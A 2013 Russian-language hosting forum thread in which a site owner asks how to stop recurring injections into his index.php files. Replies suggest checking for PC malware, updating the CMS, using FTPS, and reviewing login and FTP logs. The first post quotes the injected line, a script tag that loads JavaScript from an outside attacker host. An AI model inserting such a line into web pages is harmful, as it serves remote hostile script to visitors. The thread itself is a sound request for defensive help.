Как защититься от эксплойтов

SSL, TLS, Web protect, etc.

Модераторы: Art.i, vasya

Как защититься от эксплойтов

Сообщение kotelok » Пн янв 14, 2013 11:33 am

На моих сайтах регулярно появляются записи типа
echo '<script src="http://kinoshkaxa.changeip.name/rsize.js"></script>';
в файлах index.php.
Как защититься от их внедрения?
Вирусов на компе нет, пароль тоже менял — не помогает.
Используется FreeBSD 9 на тарифе "Улёт".
iDomainer.pro
kotelok
 
Сообщений: 36
Зарегистрирован: Пн янв 14, 2013 11:30 am

Re: Как защититься от эксплойтов

Сообщение swg » Пн янв 14, 2013 1:15 pm

Самое распространённое
- вирусы на компе, что-бы вы не говорили
- устаревшая cms : обновить
- украден FTP пароль (бывает, что крадут "по пути") : использовать FTPS; подловить провайдера
swg
флудит форум
 
Сообщений: 2382
Зарегистрирован: Сб окт 07, 2006 9:09 am
Откуда: NNov

Re: Как защититься от эксплойтов

Сообщение belkaU » Ср янв 16, 2013 12:14 am

У меня похоже. 3 января началось.

Эксплоит на базе вордпресса чего-то там создаёт, и запускает exim, пока не треснет. Выпилил всё, через поддрежку ограничил права на службу. Прошла неделя, эффект усилился. Явное дело, все пароли сменил, cms почистил, AVZ с NOD вирусов не видят. Может конечно, с другого компа упёрли (
belkaU
 
Сообщений: 13
Зарегистрирован: Вт мар 08, 2011 7:34 pm

Re: Как защититься от эксплойтов

Сообщение ls » Чт янв 17, 2013 8:31 am

Командой last смотрим входы на сервер про ftp и /var/log/xferlog - есть там все в порядке, а в файлах появляется гадость - значит дыряв какой-то скрипт. Если через FTP вирус идет - украли пароль
* FirstVDS в twitter в facebook и в вконтакте *
ls
Support team
 
Сообщений: 6384
Зарегистрирован: Чт мар 01, 2007 10:36 am
Откуда: FirstVDS


Вернуться в Безопасность

Кто сейчас на форуме

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 1